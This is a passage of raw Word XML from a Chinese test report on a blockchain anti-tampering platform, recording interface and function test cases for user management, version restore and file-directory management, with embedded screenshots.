          <w:p w14:paraId="309AF2B0"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435D27AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="75CF5459" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7826116E"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6777B107" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2053657A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE3CF5F"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17973EDD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4840BA2E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A68ADD9"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5CE21DF8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1、停用、启用账号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A49F83" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="16B5BC65" wp14:editId="55093785">
                  <wp:extent cx="4199890" cy="1567180"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="7620"/>
                  <wp:docPr id="5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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199890" cy="1567180"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B885E6C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>用户详情</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699B3C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5DA3D86F" wp14:editId="71B30279">
                  <wp:extent cx="4195445" cy="2160905"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="23495"/>
                  <wp:docPr id="5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68"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4195445" cy="2160905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="036966A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>新建根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D930A32" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B72C83A" wp14:editId="7D78450A">
                  <wp:extent cx="4199255" cy="2466340"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="22860"/>
                  <wp:docPr id="5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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199255" cy="2466340"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFB2CF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>取消根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF8722C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="353EB3AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76335963"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2AF933A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>界面显示正常，功能测试正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="65FDEA7F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="417FEE48"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63E5125A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="591A083D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc36487950"/>
      <w:bookmarkStart w:id="338" w:name="_Toc36573241"/>
      <w:bookmarkStart w:id="339" w:name="_Toc36630327"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区块链代码仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="56BB00E6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc36487951"/>
      <w:r w:rsidRPr="00536672">
        <w:t>版本信息维护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>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3D883265" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1E513E"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291FA1A0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>版本信息维护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="170CF5B3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D021A2B"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44B2B66B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试，恢复版本功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2B2C615A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673A8ACC"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4BEBABD8"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2AAF9E05" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609F720A"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5FE6DA40"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09FD8719" wp14:editId="5E34844D">
                  <wp:extent cx="4201795" cy="2238375"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="22225"/>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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2238375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="364FA35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lastRenderedPageBreak/>
              <w:t>恢复版本信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28391AA4"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1FC45CFC" wp14:editId="4B2FEF4F">
                  <wp:extent cx="4201795" cy="2241550"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1905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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2241550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BFD29B"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查看详情，点击开始恢复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FF53A9"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08FC99A5" wp14:editId="5D9F10A7">
                  <wp:extent cx="4201795" cy="2338070"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="2413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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2338070"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C393B95" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0CD16F49" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4DE5F5"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7D7BAE0F"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>恢复版本成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B0A3268" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A7047B"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7763CF07" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="613CAB27" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc36487952"/>
      <w:r w:rsidRPr="00536672">
        <w:t>文件管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>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2A2EC33B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7EDC2B"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70D15820" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>文件管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DB49702" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F046ECC"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481B6312" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看文件目录历史版本，停用、启用文件目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6664A9B1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74121006"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73FDB063"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5E3F119D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECEE283"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21D4950E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73670F47"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4EBBF9" wp14:editId="798E091C">
                  <wp:extent cx="4201795" cy="1234440"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1016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3"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1234440"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C204C9"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点击节点，查看文件目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553E85BC"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59006637" wp14:editId="7F5E2D4F">
                  <wp:extent cx="4201795" cy="2221230"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1397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4"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2221230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A9D5AA8"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查看历史版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61ABC54E"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5AFD2E07" wp14:editId="3DDBA5F9">
                  <wp:extent cx="4201795" cy="2301240"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="10160"/>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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2301240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BD3F38"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停用、启用目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182F00D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2E7B1CB9" wp14:editId="4409A1D3">
                  <wp:extent cx="4201795" cy="1663065"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="13335"/>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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1663065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B1CDFAA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34939D03" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFB41ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
